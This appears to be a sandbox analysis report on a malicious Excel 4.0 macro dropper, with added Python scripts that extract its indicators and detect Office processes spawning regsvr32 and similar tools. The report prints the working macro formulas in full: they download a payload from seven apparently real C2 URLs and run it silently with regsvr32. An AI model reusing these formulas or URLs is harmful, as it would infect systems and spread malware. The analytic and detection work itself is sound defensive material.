General

  • Target

    650af6141197b50b1dbbc8eb9183d44eab4b6214e0681c53cf22a540e75198d4

  • Size

    38KB

  • Sample

    241120-j9mjbstepg

  • MD5

    2d53cc73d114ffccf26818f01e275cb6

  • SHA1

    70b1a5c943bf915b8ea4b28ab65eba5e614c45fb

  • SHA256

    650af6141197b50b1dbbc8eb9183d44eab4b6214e0681c53cf22a540e75198d4

  • SHA512

    33f25deed21db7baafa2fd23c78c3946b021de3d2a4ebf6fc82a106e5e44a4baee795f0f4e766d7cf46d05faa9efe258482f0ad471483a9a47017deda1069091

  • SSDEEP

    768:MWV9/1ZJVOwyjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooZz:MWXd4wCOZZ1ZYpoQ/pMA0VIIlt

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://www.berekethaber.com/dosyalar/4MZnNVw8Z/

https://damjangro.org/data/IlBcH2mM/

https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/

https://www.awam.be/wp-admin/ug9Zz/

https://protokol.mx/Archivos/SjKWNoeYre/

https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/

https://bengtverhoef.nl/stats/SJ1csD7/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.berekethaber.com/dosyalar/4MZnNVw8Z/","..\dfebegfs.ocx",0,0)
    =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/IlBcH2mM/","..\dfebegfs.ocx",0,0))
    =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/","..\dfebegfs.ocx",0,0))
    =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.awam.be/wp-admin/ug9Zz/","..\dfebegfs.ocx",0,0))
    =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/SjKWNoeYre/","..\dfebegfs.ocx",0,0))
    =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/","..\dfebegfs.ocx",0,0))
    =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bengtverhoef.nl/stats/SJ1csD7/","..\dfebegfs.ocx",0,0))
    =IF('HUNJK'!E27<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\dfebegfs.ocx")
    =RETURN()
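
The formulas above are the whole dropper: an unconditional URLDownloadToFileA into ..\dfebegfs.ocx, six fallback downloads of the same file each gated by an IF on a cell of sheet HUNJK, a CLOSE if the last check also fails, and a silent regsvr32 of the dropped file. The following is an added triage script, not part of the sandbox report: it takes the "formulas" attribute exactly as the report prints it (one line, a space before each leading "=") and reconstructs that chain and its IOCs. What the HUNJK cells contain is not in the report, so the code only records the cell reference that guards each stage; the parsing helpers and their names are illustrative.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# The "formulas" attribute copied from the report: one line, one space before
# each formula's leading '='.
FORMULAS = (
    r'=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.berekethaber.com/dosyalar/4MZnNVw8Z/","..\dfebegfs.ocx",0,0) '
    r"""=IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/IlBcH2mM/","..\dfebegfs.ocx",0,0)) """
    r"""=IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/","..\dfebegfs.ocx",0,0)) """
    r"""=IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.awam.be/wp-admin/ug9Zz/","..\dfebegfs.ocx",0,0)) """
    r"""=IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/SjKWNoeYre/","..\dfebegfs.ocx",0,0)) """
    r"""=IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/","..\dfebegfs.ocx",0,0)) """
    r"""=IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bengtverhoef.nl/stats/SJ1csD7/","..\dfebegfs.ocx",0,0)) """
    r"""=IF('HUNJK'!E27<0,CLOSE(0),) """
    r'=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\dfebegfs.ocx") '
    r"=RETURN()"
)

# IF(<sheet>!<cell><0, <body>) wrapper used to gate every fallback stage.
IF_RE = re.compile(r"^=?IF\('?(?P<sheet>[^'!]+)'?!(?P<cell>[A-Z]+\d+)<0,(?P<body>.*)\)$")
CALL_RE = re.compile(r"^CALL\((?P<args>.*)\)$")
EXEC_RE = re.compile(r'^EXEC\("(?P<cmd>[^"]*)"\)$')


@dataclass
class Download:
    url: str
    dest: str
    guard: Optional[str]  # cell checked before this stage; None = unconditional first stage


@dataclass
class DropperChain:
    downloads: List[Download] = field(default_factory=list)
    close_guard: Optional[str] = None  # cell check that CLOSEs the workbook instead of a download
    exec_command: Optional[str] = None


def split_formulas(line: str) -> List[str]:
    """Split the report's single-line attribute: each formula starts with '='."""
    return re.split(r"\s+(?==)", line.strip())


def call_args(raw: str) -> List[str]:
    """Split CALL() arguments on commas outside quotes and drop the quotes."""
    return [a.strip('"') for a in re.findall(r'"[^"]*"|[^,]+', raw)]


def unwrap(formula: str) -> Tuple[Optional[str], str]:
    """Return (guard_cell, body): strip the '=' and any IF(<cell><0, ...) wrapper."""
    m = IF_RE.match(formula)
    if m:
        return m.group("cell"), m.group("body")
    return None, formula.lstrip("=")


def parse_chain(line: str) -> DropperChain:
    chain = DropperChain()
    for f in split_formulas(line):
        guard, body = unwrap(f)
        m = CALL_RE.match(body)
        if m:
            # CALL(dll, function, Excel type-signature string, <function args>);
            # URLDownloadToFileA takes (pCaller, szURL, szFileName, dwReserved, lpfnCB).
            args = call_args(m.group("args"))
            if args[:2] == ["urlmon", "URLDownloadToFileA"] and len(args) >= 6:
                chain.downloads.append(Download(url=args[4], dest=args[5], guard=guard))
            continue
        if body.startswith("CLOSE("):
            chain.close_guard = guard
            continue
        m = EXEC_RE.match(body)
        if m:
            chain.exec_command = m.group("cmd")
    return chain


def iocs(chain: DropperChain) -> dict:
    dests = {d.dest for d in chain.downloads}
    dropped = dests.pop() if len(dests) == 1 else None  # every stage writes the same file
    return {
        "urls": [d.url for d in chain.downloads],
        "domains": sorted({urlparse(d.url).netloc for d in chain.downloads}),
        "dropped_file": dropped,
        "command": chain.exec_command,
        # True when the EXEC line runs the file the download stages write.
        "executes_dropped_file": bool(dropped and chain.exec_command and dropped in chain.exec_command),
    }


if __name__ == "__main__":
    import json
    chain = parse_chain(FORMULAS)
    for d in chain.downloads:
        print(f"{(d.guard or 'always'):>6}  {d.url}  ->  {d.dest}")
    print(json.dumps(iocs(chain), indent=2))
```

The guard cells show the fallback order (E15 through E25 for the six alternate URLs, E27 for the CLOSE), and `executes_dropped_file` confirms the EXEC targets the one path all seven stages write, which is why the sandbox reports a single dropped file and seven C2 URLs.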

Extracted

Language
xlm4.0

Source          URLs
xlm40.dropper   https://www.berekethaber.com/dosyalar/4MZnNVw8Z/
xlm40.dropper   https://damjangro.org/data/IlBcH2mM/
xlm40.dropper   https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/
xlm40.dropper   https://www.awam.be/wp-admin/ug9Zz/
xlm40.dropper   https://protokol.mx/Archivos/SjKWNoeYre/
xlm40.dropper   https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/
xlm40.dropper   https://bengtverhoef.nl/stats/SJ1csD7/

Targets

    • Target

      650af6141197b50b1dbbc8eb9183d44eab4b6214e0681c53cf22a540e75198d4

    • Size

      38KB

    • MD5

      2d53cc73d114ffccf26818f01e275cb6

    • SHA1

      70b1a5c943bf915b8ea4b28ab65eba5e614c45fb

    • SHA256

      650af6141197b50b1dbbc8eb9183d44eab4b6214e0681c53cf22a540e75198d4

    • SHA512

      33f25deed21db7baafa2fd23c78c3946b021de3d2a4ebf6fc82a106e5e44a4baee795f0f4e766d7cf46d05faa9efe258482f0ad471483a9a47017deda1069091

    • SSDEEP

      768:MWV9/1ZJVOwyjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooZz:MWXd4wCOZZ1ZYpoQ/pMA0VIIlt

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
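
A process-tree check for that signature, written here as an added example and not the sandbox's own rule. It runs over constructed Sysmon-style process-creation records; the Office parent list, the child-process lists, the allowlist and the severities are assumptions to tune per environment. Event 2 is the process the EXEC formula in this sample would produce if regsvr32 ran the dropped .ocx; the report shows that command line but not the process tree, so the record is constructed, as are the other five.

```python
from typing import Dict, List

# Assumed lists; none of this comes from the sandbox. Tune per environment.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBIN_CHILDREN = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
                   "cscript.exe", "powershell.exe", "cmd.exe", "certutil.exe"}
EXPECTED_CHILDREN = {"splwow64.exe"}  # print helper Excel starts legitimately (assumed allowlist)

# Constructed Sysmon-style (Event ID 1) records, not real telemetry.
EVENTS: List[Dict[str, str]] = [
    {"id": "1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" C:\Users\alice\Downloads\invoice.xls'},
    {"id": "2", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r"C:\Windows\SysWow64\regsvr32.exe -s ..\dfebegfs.ocx"},
    {"id": "3", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"id": "4", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"C:\Windows\System32\regsvr32.exe /s C:\Vendor\plugin.dll"},
    {"id": "5", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r"cmd.exe /c whoami"},
    {"id": "6", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\update.exe"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def regsvr32_silent_non_dll(cmdline: str) -> bool:
    """True for 'regsvr32 -s|/s <file>' where <file> is not a .dll: the shape of
    this sample's EXEC line (a .ocx reached via a relative path)."""
    tokens = cmdline.split()  # naive: unquoted paths with spaces need a real Windows argv parser
    flags = {t.lower() for t in tokens[1:] if t.startswith(("-", "/"))}
    targets = [t for t in tokens[1:] if not t.startswith(("-", "/"))]
    return bool(flags & {"-s", "/s"}) and bool(targets) and not targets[-1].lower().endswith(".dll")


def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Flag any non-allowlisted child of an Office process; raise severity for LOLBins."""
    alerts = []
    for e in events:
        parent, child = basename(e["ParentImage"]), basename(e["Image"])
        if parent not in OFFICE_PARENTS or child in EXPECTED_CHILDREN:
            continue
        if child not in LOLBIN_CHILDREN:
            severity, reason = "low", f"{parent} spawned unexpected child {child}"
        elif child == "regsvr32.exe" and regsvr32_silent_non_dll(e["CommandLine"]):
            severity, reason = "high", f"{parent} spawned regsvr32.exe silently registering a non-DLL"
        else:
            severity, reason = "medium", f"{parent} spawned {child}"
        alerts.append({"id": e["id"], "severity": severity, "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"[{a['severity']}] event {a['id']}: {a['reason']}")
```

Only the Office-parent condition makes this signature fire: the same regsvr32 invocation under svchost.exe (event 4) is not flagged by this rule, while the Excel-spawned one (event 2) is raised to high because it silently registers a file that is not a .dll, exactly what the EXEC formula above does.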

MITRE ATT&CK Enterprise v15

Tasks